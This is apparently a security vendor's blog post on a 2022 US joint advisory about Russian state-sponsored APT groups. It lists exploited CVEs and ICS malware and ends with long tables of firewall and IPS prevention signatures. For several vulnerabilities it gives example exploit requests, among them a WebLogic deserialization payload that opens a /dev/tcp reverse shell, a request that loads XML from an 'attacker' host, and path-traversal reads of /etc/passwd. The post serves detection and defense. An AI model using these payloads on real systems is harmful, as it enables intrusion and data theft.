Simulating and Preventing Cyber Attacks to Critical Infrastructure

The Red Report 2024

The Top 10 MITRE ATT&CK Techniques Used by Adversaries

DOWNLOAD

US CISA (Cybersecurity and Infrastructure Security Agency), FBI (Federal Bureau of Investigation), and NSA (the National Security Agency) issued a joint alert (AA22-011a)  today (January 11, 2022),  highlighting ongoing malicious cyber operations by Russian state-sponsored Advanced Persistent Threat (APT) actors. This joint advisory aims to assist the cybersecurity community in reducing the risk posed by these threats. In this blog, we share information about the simulation and mitigation of these attacks to help the cybersecurity community.

Vulnerabilities Used by Russian State-Sponsored Cyber Threats

Russian state-sponsored threat actors commonly gain initial access to target networks by effective attack techniques, including spearphishing, brute force, and exploiting public-facing applications. Vulnerabilities known to be exploited for initial access by Russian state-sponsored APT actors include the following:

CVE

Affected Product

Vulnerability Type

CVSS Score

CVE-2021-26855

Microsoft Exchange

Remote Code Execution (RCE)

9.8 Critical

 

CVE-2020-5902

F5 Big-IP

Remote Code Execution (RCE)

9.8 Critical

CVE-2020-4006

VMWare

OS Command Injection

9.1 Critical

CVE-2020-14882

Oracle WebLogic

Remote Code Execution (RCE)

9.8 Critical

CVE-2020-0688

Microsoft Exchange

Remote Code Execution (RCE)

8.8 High

CVE-2019-9670

Zimbra software

XML External Entity injection (XXE)

9.8 Critical

CVE-2019-7609

Kibana

Code Injection

10.0 Critical

CVE-2019-2725

Oracle WebLogic Server

Remote Code Execution (RCE)

9.8 Critical

CVE-2019-19781

Citrix

Remote Code Execution (RCE)

9.8 Critical

CVE-2019-1653

Cisco router

Exposure of Sensitive Information

7.5 High

CVE-2019-11510

Pulse Secure

Remote Code Execution (RCE)

9.8 Critical

CVE-2019-10149

Exim Simple Mail Transfer Protocol

OS Command Injection

9.8 Critical

CVE-2018-13379

FortiGate VPNs

Path Traversal

9.8 Critical

 

Test your security controls now: Simulate and Prevent Exploits with Picus

         

          Microsoft Exchange RCE Vulnerability (CVE-2021-26855):  

Adversaries chain the CVE-2021-26855 vulnerability with CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065  vulnerabilities to compromise the target Exchange server. In addition to Russian state-sponsored threat actors, the HAFNIUM group also uses these Microsoft Exchange Server vulnerabilities.

Example payload:

GET /owa/auth/x.js HTTP/1.1


"Cookie": "X-AnonResource=true; X-AnonResource-Backend=127.0.0.1/ecp/default.flt?~3; X-BEResource=127.0.0.1/owa/auth/logon.aspx?~3;"

        F5 Big-IP RCE Vulnerability (CVE-2020-5902):

Threat actors have exploited this vulnerability in the BIG-IP Traffic Management User Interface (TMUI) to take control of target systems. CVE-2020-5902 vulnerability allows attackers to execute arbitrary system commands and Java codes, create or delete files, and disable services. This vulnerability is also commonly used by ransomware groups.

Example payload:

GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=list%2Bauth%2Buser%2Badmin HTTP/1.1

        VMWare OS Command Injection Vulnerability (CVE-2020-4006):

Russian state-sponsored APT groups exploit this command injection vulnerability in VMware Access and VMware Identity Manager products that allow threat actors access to protected data and abuse federated authentication. Because the exploit requires password-based access to the web-based management interface of the device, employing a strong and unique password reduces the likelihood of exploitation.

        Oracle WebLogic RCE Vulnerability (CVE-2020-14882):

This RCE Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware allows an unauthenticated attacker to compromise Oracle WebLogic Server. 

Example payload:

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
...

_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://attacker/poc.xml")

        Microsoft Exchange RCE Vulnerability (CVE-2020-0688):

Microsoft Exchange Servers continue to be an appealing target for threat actors due to the CVE-2020-0688 remote code execution vulnerability in addition to CVE-2021-26855. A remote attacker can use this vulnerability to gain control of an unpatched system. The exploit payload of this vulnerability is among the stolen exploits from FireEye.

Example payload:

GET /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=/wEytQYAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc………pQGD/ytBljKq8XhAgchG HTTP/1.1

        Zimbra  XML External Entity injection (XXE) Vulnerability (CVE-2019-9670):

The CVE-2019-9670 XXE vulnerability in the mailboxd component in Synacor Zimbra Collaboration Suite allows attackers to upload a JSP webshell that can be triggered from the web server to get command execution on the target system. This  vulnerability has recently been added to the  Known Exploited Vulnerabilities Catalog of US CISA.

Example payload:

POST /autodiscover HTTP/1.1
...

http://127.0.0.1:8000/87WSCCk3'>%uhgur;]><Autodiscover><Request><EMailAddress>test@test.test</EMailAddress><AcceptableResponseSchema>&zgwt;</AcceptableResponseSchema></Request></Autodiscover>

        Kibana Code Injection Vulnerability (CVE-2019-7609):

The CVE-2019-7609 code injection vulnerability in Kibana’s Timelion visualizer allows an attacker to execute arbitrary commands on the host under the same permissions as the vulnerable Kibana process. This is another vulnerability that has recently been added to the  Known Exploited Vulnerabilities Catalog of US CISA.

        Oracle WebLogic Server RCE Vulnerability (CVE-2019-2725):

A deserialization vulnerability in Oracle WebLogic Server is exploited by threat actors for unauthenticated remote code execution. This vulnerability was also used in a ransomware campaign of the ransomware group called Sodinokibi, also known as REvil.

Example payload:

POST /_async/AsyncResponseService HTTP/1.1


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:wsa="http://www.w3.org/2005/08/addressing"xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>OxEtrsnxGT8RRbXLx3ZD</wsa:Action><wsa:RelatesTo>2RR3WIgKZAvM4VsvMPyt</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>0&lt;&amp;41-;exec 41&lt;&gt;/dev/tcp/192.168.1.2/4444;sh &lt;&amp;41 &gt;&amp;41 2&gt;&amp;41</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

        Citrix RCE Vulnerability (CVE-2019-19781):

A critical vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway was exploited for arbitrary code execution. Due to delayed patch release, threat actors exploited the vulnerability for weeks. According to US CISA, once threat actors got a foothold on the victim’s network, their access remained even though the original attack vector was closed. 

Example payload:

GET /vpn/../vpns/cfg/smb.conf HTTP/1.1

        Cisco Router Exposure of Sensitive Information Vulnerability (CVE-2019-1653):

More than 9000 Cisco RV320/RV325 routers were vulnerable to remote unauthenticated information disclosure, and when exploited together with CVE-2019-1652, it led to remote code execution with root privileges.

        Pulse Secure RCE Vulnerability (CVE-2019-11510):

This arbitrary file reading vulnerability is also exploited by the Sodinokibi ransomware campaign to gain access to private keys and user passwords. When exploited with CVE-2019-11539, this caused attackers to gain remote access inside victims’ private VPN networks.

Example payload:

GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1

        Exim SMTP OS Command Injection Vulnerability (CVE-2019-10149):

According to the NSA, Sandworm, a Russian APT group, exploited this vulnerability in their malware. The vulnerability in the Exim Mail Transfer Agent can be used to gain unauthenticated remote code execution with root privileges via specially crafted email. 

        FortiGate VPNs Path Traversal Vulnerability (CVE-2018-13379):

According to the FBI and US CISA, this vulnerability was exploited with other vulnerabilities (CVE-2020-12812 and CVE-2019-5591) to gain initial access to critical infrastructure networks by APT groups. Also, this vulnerability is used in the initial access stage of the Cring ransomware campaign.

Example payload:

GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1

Malware Used by Russian State-Sponsored Cyber Threats

Russian state-sponsored APT actors also use destructive malware to target operational technology (OT) / industrial control systems (ICS) networks, including the following malware targeting critical infrastructure:

Malware

Type

APT Group

Known Attacks

BlackEnergy

Backdoor & Destructive

Sandworm (Electrum, Voodoo Bear)

Ukraine’s power grid in December, 2015

CrashOverride (Industroyer)

Backdoor & Destructive

Sandworm (Electrum, Voodoo Bear)

Ukraine’s power grid on December, 2016

HatMan (TRITON, TRISIS)

Backdoor & Destructive

XENOTIME (TEMP.Veles)

Saudi Arabian petrochemical plant in 2017

Havex (Backdoor.Oldrea)

Remote Access Trojan (RAT)

Dragonfly (Energetic Bear, TG-4192)

Energy and petrochemical companies in United States and Europe

KillDisk

Destructive

Sandworm (Electrum, Voodoo Bear)

Ukraine’s power grid in December, 2015

NotPetya

Destructive

Sandworm (Electrum, Voodoo Bear)

Worldwide attack campaign in 2017, Merck in 2019

Some malware families targeting critical infrastructure (e.g., NotPetya) are self-propagating (wormable) and initially infected IT networks, but through either vulnerability exploitation or dynamic credential capture-and-reuse capabilities, spread to industrial networks producing significant impacts.

How Picus Helps Simulate Exploits Used by Russian State-Sponsored APTs

If you know the particular TTPs employed by adversaries in a cyberattack, you can apply the Adversary Emulation Process recommended by MITRE ATT&CK. This process begins with the collection of threat intelligence, the extraction of techniques, the development of tools, and the execution of attack simulations to emulate the adversary. For example, you can use the payloads given above to simulate the exploit of the relevant vulnerability.

The adversary emulation process can be managed by your red team in collaboration with your blue team. Suppose your red team is unavailable or too busy. In that case, the blue team can either do the adversary emulation process independently or use a Breach and Attack Simulation (BAS) product. Breach and Attack Simulation (BAS) is a collection of technologies designed to test cybersecurity systems against realistic attack scenarios to reveal defense gaps and detection shortcomings before an attack or an incident occurs.

Adversary Emulation Process by MITRE ATT&CK

Adversary Emulation Process recommended by MITRE ATT&CK

Picus Complete Security Validation Platform includes following threats for vulnerabilities used by threat actors targeting critical infrastructure. Moreover, it contains 1500+ vulnerability exploitation and endpoint attacks in addition to 11.000+ other threats as of today.

CVE

Picus Threat Name

CVE-2021-26855

Microsoft Exchange Server Unauthorized SSRF Vulnerability Variant-1

CVE-2021-26855

Microsoft Exchange Server Unauthorized SSRF Vulnerability Variant-2

CVE-2020-5902

F5 BIG-IP Remote Code Execution (RCE) Vulnerability

CVE-2020-5902

F5 BIG-IP Local File Inclusion (LFI) Vulnerability

CVE-2020-14882

Oracle Weblogic Server Unauthorized Bypass RCE Variant-1

CVE-2020-14882

Oracle Weblogic Server Unauthorized Bypass RCE Variant-2

CVE-2020-14882

Oracle Weblogic Server Unauthorized Bypass RCE Variant-3

CVE-2020-0688

Microsoft Exchange Validation Key Remote Code Execution (RCE) Vulnerability

CVE-2019-9670

Zimbra 'Client Upload Servlet' File Upload to Code Execution Vulnerability

CVE-2019-9670

Zimbra 'mailboxd' XML External Entity Injection (XXE) Vulnerability

CVE-2019-2725

Oracle Weblogic Server 'AsyncResponseService' Deserialization RCE Variant-1

CVE-2019-19781

Citrix Application Delivery Controller (ADC) and Gateway Path Traversal Vulnerability Variant-1

CVE-2019-19781

Citrix Application Delivery Controller (ADC) and Gateway Path Traversal Vulnerability Variant-2

CVE-2019-11510

Pulse Secure SSL VPN Arbitrary File Read Variant-1

CVE-2019-10149

Exim Privilege Escalation .SH File Download Variant-1

CVE-2018-13379

Fortinet FortiGate SSL VPN Arbitrary File Read Variant-1

See Picus in Action

We strongly suggest simulating vulnerability exploits to test the effectiveness of your security controls against cyber attacks, determine gaps, and utilize prevention signatures to fill your security gaps using the Picus Security Control Validation Platform. 

Just click Start to see and try how you can simulate an example vulnerability exploitation attack (CVE-2021-2685 Microsoft Exchange Server) and obtain prevention signatures using Picus with just a few clicks.

 

Test your security controls now: Simulate and Prevent Attacks with Picus

 

How Picus Helps Simulate Malware Used by Russian State-Sponsored APTs

Picus can also simulate all malware used by Russian State-Sponsored APTs with the following threats in its Threat Library. In addition to them, Picus Threat Library includes 7000+ malware attacks.

Malware

Picus Threat Name

BlackEnergy

BlackEnergy Backdoor Malware .EXE File Download Variant-1

BlackEnergy

BlackEnergy Backdoor Malware .EXE File Download Variant-2

BlackEnergy

BlackEnergy Malware Attack Scenario

CrashOverride (Industroyer)

CrashOverride Malware .DLL File Download Variant-1

CrashOverride (Industroyer)

CrashOverride Trojan .EXE File Download Variant-1

CrashOverride (Industroyer)

CrashOverride Trojan .EXE File Download Variant-2

CrashOverride (Industroyer)

CrashOverride Trojan .EXE File Download Variant-3

HatMan (TRITON, TRISIS)

HatMan Malware .PYC File Download Variant-1

HatMan (TRITON, TRISIS)

HatMan Malware .PYC File Download Variant-2

HatMan (TRITON, TRISIS)

HatMan Malware .PYC File Download Variant-3

HatMan (TRITON, TRISIS)

HatMan Malware .PYC File Download Variant-4

HatMan (TRITON, TRISIS)

HatMan Malware .PYC File Download Variant-5

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-1

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-2

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-3

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-4

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-5

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-6

Havex (Backdoor.Oldrea)

Havex Trojan .EXE File Download Variant-7

KillDisk

KillDisk Ransomware .EXE File Download Variant-1

KillDisk

KillDisk Ransomware .EXE File Download Variant-2

KillDisk

KillDisk Ransomware .EXE File Download Variant-3

KillDisk

KillDisk Ransomware .EXE File Download Variant-4

KillDisk

KillDisk Ransomware .EXE File Download Variant-5

NotPetya

Petya Ransomware .EXE File Download Variant-1

NotPetya

Petya Ransomware .EXE File Download Variant-2

NotPetya

Petya Ransomware (EternalBlue) .DLL File Download Variant-1

NotPetya

Petya Ransomware (EternalBlue) .DLL File Download Variant-2

NotPetya

Petya Ransomware (EternalBlue) Using Mimikatz Hacktool .EXE File Download Variant-1

NotPetya

Petya Ransomware (EternalBlue) Using Mimikatz Hacktool .EXE File Download Variant-2

 

Test your security controls now: Simulate and Prevent Malware with Picus

 

How Picus Helps Prevent Attacks of Advanced Persistent Threats (APTs)

In addition to Breach and Attack Simulation, Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address the following vulnerabilities used by APT groups and other vulnerability exploitation attacks in preventive security controls.

Prevention Signatures for CVE-2021-26855 Microsoft Exchange RCE Vulnerability

Security Control

Signature ID

Signature Name

Cisco Firepower NGFW

57241

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

Cisco Firepower NGFW

57242

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

Cisco Firepower NGFW

57244

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

Citrix Web App Firewall

999311

web-misc microsoft exchange server - remote code execution vulnerability via x-anonresource-backend (cve-2021-26855)

Citrix Web App Firewall

999312

web-misc microsoft exchange server - remote code execution vulnerability via x-beresource (cve-2021-26855)

F5 BIG-IP ASM

200018127

Microsoft Exchange X-BEResource SSRF

F5 BIG-IP ASM

200018128

Microsoft Exchange X-AnonResource-Backend SSRF

Forcepoint NGFW

 

HTTP_CSH-Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855

FortiGate NGFW

49950

email: MS.Exchange.Server.ProxyRequestHandler.Remote.Code.Execution

Imperva SecureSphere

 

CVE-2021-26855: Exchange Server HAFNIUM SSRF - X-BEResource Cookie

Imperva SecureSphere

 

CVE-2021-26855: Exchange Server HAFNIUM SSRF - X-AnonResource-Backend Cookie

McAfee IPS

0x4528a400

HTTP: Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)

Snort IPS

57241

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

Snort IPS

57242

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

Snort IPS

57244

SERVER-WEBAPP Microsoft Exchange Server server side request forgery attempt

TippingPoint TPS

39101

HTTP: Microsoft Exchange Server Side Request Forgery Vulnerability

Prevention Signatures for CVE-2020-5902 F5 Big-IP RCE Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2020_5902

F5 BIG-IP Remote Code Execution (CVE-2020-5902)

Cisco Firepower NGFW

1599

SERVER-WEBAPP Multiple Vendor server file disclosure attempt

Cisco Firepower NGFW

54462

SERVER-WEBAPP F5 BIG-IP Traffic Management User Interface remote code execution attempt

Citrix Web App Firewall

999540

web-misc f5 big-ip - traffic management user interface rce vulnerability via /tmui (cve-2020-5902)

F5 BIG-IP ASM

200003909

"/etc/passwd" access (Parameter)

F5 BIG-IP ASM

200007032

Directory Traversal attempt '.;' (URI)

F5 BIG-IP ASM

200007041

Tomcat Directory Traversal attempt

F5 BIG-IP ASM

200010175

"/etc/passwd" access (2) (Parameter)

F5 BIG-IP ASM

200015110

BIG-IP TMUI Remote Code Execution

Forcepoint NGFW

 

HTTP_CRL-F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902

Forcepoint NGFW

 

HTTP_CSU-Potential-System-File-Disclosure

FortiGate NGFW

49330

applications3: F5.BIG.IP.Traffic.Management.User.Interface.Directory.Traversal

FortiWeb Web Application Security

90501141

Known Exploits

Imperva SecureSphere

 

WEB-MISC /etc/passwd

McAfee IPS

0x4020af00

HTTP: Attempt to Read Password File

ModSecurity

930110

Path Traversal Attack (/../)

ModSecurity

930120

OS File Access Attempt

ModSecurity

932160

Remote Command Execution: Unix Shell Code Found

Palo Alto Networks NGFW

58623

F5 Traffic Management User Interface Remote Code Execution Vulnerability

Snort IPS

1599

SERVER-WEBAPP Multiple Vendor server file disclosure attempt

Snort IPS

54462

SERVER-WEBAPP F5 BIG-IP Traffic Management User Interface remote code execution attempt

TippingPoint TPS

361

HTTP: Protected File Access (/etc/passwd)

TippingPoint TPS

38609

HTTP: .jsp Directory Traversal Usage

Prevention Signatures for CVE-2020-14882 Oracle WebLogic RCE Vulnerability

Security Control

Signature ID

Signature Name

Citrix Web App Firewall

999408

web-misc oracle weblogic server - authentication bypass vulnerability (cve-2020-14882, cve-2020-14750)

F5 BIG-IP ASM

200003437

Java code injection - java/lang/Runtime (Parameter)

F5 BIG-IP ASM

200003443

Java code injection - Runtime.getRuntime (Parameter)

F5 BIG-IP ASM

200004152

Java Code Injection (java packages) (Params)

F5 BIG-IP ASM

200004758

Java code injection - com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext (Parameter)

F5 BIG-IP ASM

200004760

Java code injection - com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext

F5 BIG-IP ASM

200004816

Java code injection - support.FileSystemXmlApplicationContext (2) (Parameter)

F5 BIG-IP ASM

200004818

Java code injection - support.FileSystemXmlApplicationContext (2)

Forcepoint NGFW

 

HTTP_CRL-Oracle-WebLogic-Server-CVE-2020-14882

FortiGate NGFW

49590

web_server: Oracle.WebLogic.Fusion.Middleware.Authentication.Bypass

FortiWeb Web Application Security

50170001

Generic Attacks

FortiWeb Web Application Security

60140003

Generic Attacks(Extended)

FortiWeb Web Application Security

N/A

SQL Function Based Boolean Injection

Imperva SecureSphere

 

CVE-2020-14882: Oracle WebLogic Server RCE

McAfee IPS

0x45285200

HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability

ModSecurity

930100

Path Traversal Attack (/../)

ModSecurity

930110

Path Traversal Attack (/../)

ModSecurity

944130

Suspicious Java class detected

ModSecurity

944250

Remote Command Execution: Suspicious Java method detected

Palo Alto Networks NGFW

59940

Oracle WebLogic Server Remote Code Execution Vulnerability

Snort IPS

56203

SERVER-WEBAPP Oracle WebLogic Server command injection attempt

Snort IPS

2031185

ET WEB_SPECIFIC_APPS Possible Oracle WebLogic RCE Inbound M3 (CVE-2020-14882)

TippingPoint TPS

38380

HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability

Prevention Signatures for CVE-2020-0688 Microsoft Exchange RCE Vulnerability

Security Control

Signature ID

Signature Name

Cisco Firepower NGFW

53347

SERVER-WEBAPP Microsoft Exchange Control Panel remote code execution attempt

Cisco Firepower NGFW

1533821

SERVER-WEBAPP Microsoft Exchange Control Panel static viewstate key use attempt

Cisco Firepower NGFW

1533831

SERVER-WEBAPP Microsoft Exchange Control Panel remote code execution attempt

Citrix Web App Firewall

999653

web-misc microsoft exchange server - validation key remote code execution vulnerability (cve-2020-0688)

F5 BIG-IP ASM

200104092

ASP.NET code injection - Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties (Parameter)

Forcepoint NGFW

 

HTTP_CRL-Microsoft-Exchange-Validation-Key-Remote-Code-Execution

FortiGate NGFW

48765

applications3: MS.Exchange.Validation.Key.ViewState.Remote.Code.Execution

FortiWeb Web Application Security

90501065

Known Exploits

Palo Alto Networks NGFW

57766

Microsoft Exchange Remote Code Execution Vulnerability

Snort IPS

53347

SERVER-WEBAPP Microsoft Exchange Control Panel remote code execution attempt

Snort IPS

53382

SERVER-WEBAPP Microsoft Exchange Control Panel static viewstate key use attempt

Snort IPS

53383

SERVER-WEBAPP Microsoft Exchange Control Panel remote code execution attempt

Snort IPS

202954

ET WEB_SPECIFIC_APPS Possible Attempted Microsoft Exchange RCE (CVE-2020-0688)

Prevention Signatures for CVE-2019-9670 Zimbra XXE Vulnerability

Security Control

Signature ID

Signature Name

Cisco Firepower NGFW

45834

SERVER-WEBAPP /bin/sh access

Citrix Web App Firewall

 

Blocked by 'HTML Cross-Site Scripting' Security Check

FortiGate NGFW

47774

applications3: Zimbra.Collaboration.Autodiscover.Servlet.XXE

Palo Alto Networks NGFW

54794

Meterpreter JSP Reverse Shell Detection

Prevention Signatures for CVE-2019-7609 Kibana Code Injection Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

 

Kibana Timelion Remote Code Execution (CVE-2019-7609)

Cisco Firepower NGFW

52835

SERVER-WEBAPP Kibana Timelion prototype pollution code execution attempt

Citrix Web App Firewall

999793

WEB-MISC Elastic Kibana Prior to 5.6.15 and 6.6.1 - Prototype Pollution Vulnerability Allows Unauthenticated RCE (CVE-2019-7609)

Forcepoint NGFW

 

HTTP_CRL-Elastic-Kibana-Timelion-Prototype-Pollution

FortiGate NGFW

48501

Elastic.Kibana.Timelion.Code.Injection

McAfee IPS

0x45272500

HTTP: Elastic Kibana Timelion Prototype Pollution Vulnerability (CVE-2019-7609)

Palo Alto Networks NGFW

56835

Kibana Timelion Remote Code Execution Vulnerabilitiy

Snort IPS

2033452

ET WEB_SPECIFIC_APPS Kibana Prototype Pollution RCE Inbound (CVE-2019-7609)

Prevention Signatures for CVE-2019-2725 Oracle WebLogic Server RCE Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2019_2725

Oracle WebLogic Server Remote Code Execution (CVE-2019-2725)

Cisco Firepower NGFW

49942

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

Cisco Firepower NGFW

50019

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

Cisco Firepower NGFW

50025

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

FortiGate NGFW

47799

web_server: Oracle.WebLogic.Server.wls9_async.Component.Code.Injection

McAfee IPS

0x45262000

HTTP: Oracle WebLogic Server Deserialization Vulnerability (CVE-2019-2725/2729)

ModSecurity

944100

Remote Command Execution: Suspicious Java class detected

ModSecurity

944110

Remote Command Execution: Java process spawn (CVE-2017-9805)

ModSecurity

944130

Suspicious Java class detected

ModSecurity

944250

Remote Command Execution: Suspicious Java method detected

Palo Alto Networks NGFW

55570

Oracle WebLogic wls9-async Remote Code Execution Vulnerability

Snort IPS

49942

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

Snort IPS

50019

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

Snort IPS

50025

SERVER-ORACLE Oracle WebLogic Server remote command execution attempt

TippingPoint TPS

35085

HTTP: Oracle WebLogic Server Remote Code Execution Vulnerability

Prevention Signatures for CVE-2019-19781 Citrix RCE Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2019_19781

Citrix Multiple Products Directory Traversal (CVE-2019-19781)

Cisco Firepower NGFW

52512

SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt

Cisco Firepower NGFW

52603

SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt

F5 BIG-IP ASM

200003139

"exec" execution attempt

F5 BIG-IP ASM

200004161

PHP injection attempt (exec)

F5 BIG-IP ASM

200004998

Citrix NetScaler NSC_USER Remote Code Execution

F5 BIG-IP ASM

200007011

Directory Traversal attempt "../" (Header)

F5 BIG-IP ASM

200007029

Directory Traversal attempt "../" (URI)

F5 BIG-IP ASM

200010036

(GHDB) Smb.conf access

F5 BIG-IP ASM

200101550

Directory Traversal attempt (Content)

Forcepoint NGFW

 

HTTP_CRL-Citrix-Path-Traversal-CVE-2019-19781

FortiGate NGFW

48653

applications3: Citrix.Application.Delivery.Controller.VPNs.Directory.Traversal

FortiWeb Web Application Security

90501033

Known Exploits

Imperva SecureSphere

 

CVE-2019-19781: Citrix ADC/Gateway Remote Code Execution

McAfee IPS

0x40200c00

HTTP: CGI Escape Character Directory Traversal Vulnerability

McAfee IPS

0x4515b100

HTTP: CGI Escape Character Directory Traversal II

McAfee IPS

0x45272800

HTTP: Citrix ADC Arbitrary Code Execution Vulnerability (CVE-2019-19781)

ModSecurity

930100

Path Traversal Attack (/../)

ModSecurity

930110

Path Traversal Attack (/../)

Palo Alto Networks NGFW

57497

Citrix Application Delivery Controller And Gateway Directory Traversal Vulnerability

Snort IPS

52512

SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt

Snort IPS

52603

SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt

Snort IPS

2029206

ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781)

Snort IPS

2029255

ET EXPLOIT Possible Citrix Application Delivery Controller Arbitrary Code Execution Attempt (CVE-2019-19781) M2

TippingPoint TPS

36876

HTTP: Citrix Application Delivery Controller (ADC) Directory Traversal Vulnerability

Prevention Signatures for CVE-2019-1653 Cisco Router Exposure of Sensitive Information Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

 

Cisco RV320 and RV325 Routers Information Disclosure (CVE-2019-1653)

Cisco Firepower NGFW

48949

SERVER-WEBAPP Cisco RV Series Routers information disclosure attempt

Cisco Firepower NGFW

49619

SERVER-WEBAPP Cisco RV Series Routers information disclosure attempt

Forcepoint NGFW

 

HTTP_CRL-Cisco-RV320-And-RV325-Unauthenticated-Remote-Code-Execution

FortiWeb Web Application Security

90500765

Known Exploits

McAfee IPS

0x4525a200

HTTP: Cisco RV320 And RV325 Routers Information Disclosure Vulnerability (CVE-2019-1653)

Palo Alto Networks NGFW

55025

Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability

Palo Alto Networks NGFW

55821

Cisco RV320/RV325 Router Unauthenticated Configuration Export Information Disclosure Vulnerability

Snort IPS

2033089

ET EXPLOIT Cisco RV320/RV325 Config Disclosure Attempt Inbound (CVE-2019-1653)

Snort IPS

2033090

ET EXPLOIT Successful Cisco RV320/RV325 Config Disclosure (CVE-2019-1653)

Snort IPS

2033091

ET EXPLOIT Cisco RV320/RV325 Debug Dump Disclosure Attempt Inbound (CVE-2019-1653)

Snort IPS

2033092

ET EXPLOIT Successful Cisco RV320/RV325 Debug Dump Disclosure (CVE-2019-1653)

Snort IPS

2034278

ET EXPLOIT Cisco RV320/RV325 RCE (CVE-2019-1653)

Prevention Signatures for CVE-2019-11510 Pulse Secure RCE Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2019_11510

Pulse Connect Secure File Disclosure (CVE-2019-11510)

Cisco Firepower NGFW

51288

SERVER-WEBAPP Pulse Secure SSL VPN arbitrary file read attempt

Cisco Firepower NGFW

51289

SERVER-WEBAPP Pulse Secure SSL VPN directory traversal attempt

Citrix Web App Firewall

1122

web-misc /etc/passwd

F5 BIG-IP ASM

200003056

"/etc" execution attempt (URI)

F5 BIG-IP ASM

200007029

Directory Traversal attempt "../" (URI)

F5 BIG-IP ASM

200010468

"/etc/passwd" access (URI)

F5 BIG-IP ASM

200101550

Directory Traversal attempt (Content)

Forcepoint NGFW

 

HTTP_CSU-Pulse-Secure-SSL-VPN-Pre-Auth-Arbitrary-File-Reading

Forcepoint NGFW

 

HTTP_CSU-Dot-Dot-Slash-Dot-Dot-Slash-Dot-Dot-Directory-Traversal

FortiGate NGFW

48342

applications3: Pulse.Secure.SSL.VPN.HTML5.Information.Disclosure

FortiWeb Web Application Security

50180003

Generic Attacks

Imperva SecureSphere

 

WEB-MISC /etc/passwd

Imperva SecureSphere

 

Directory Traversal - 16

McAfee IPS

0x40200c00

HTTP: CGI Escape Character Directory Traversal Vulnerability

McAfee IPS

0x4020af00

HTTP: Attempt to Read Password File

McAfee IPS

0x40286200

HTTP: Possible Sensitive Files I

Palo Alto Networks NGFW

30844

HTTP Directory Traversal Request Attempt

Snort IPS

51288

SERVER-WEBAPP Pulse Secure SSL VPN arbitrary file read attempt

Snort IPS

51289

SERVER-WEBAPP Pulse Secure SSL VPN directory traversal attempt

TippingPoint TPS

36241

HTTP: Pulse Secure Guacamole URI Information Disclosure Vulnerability

Prevention Signatures for CVE-2019-10149 Exim SMTP OS Command Injection Vulnerability

Security Control

Signature ID

Signature Name

Forcepoint NGFW

 

File_Malware-Blocked

Prevention Signatures for CVE-2018-13379 FortiGate VPNs Path Traversal Vulnerability

Security Control

Signature ID

Signature Name

Check Point NGFW

asm_dynamic_prop_CVE_2018_13379

Fortinet FortiOS SSL VPN Directory Traversal (CVE-2018-13379)

Cisco Firepower NGFW

5137

SERVER-WEBAPP Fortinet FortiOS SSL VPN web portal directory traversal attempt

F5 BIG-IP ASM

200000190

Directory Traversal attempt "../../" (Parameter)

F5 BIG-IP ASM

200007016

Directory Traversal attempt "../" (Parameter)

F5 BIG-IP ASM

200101550

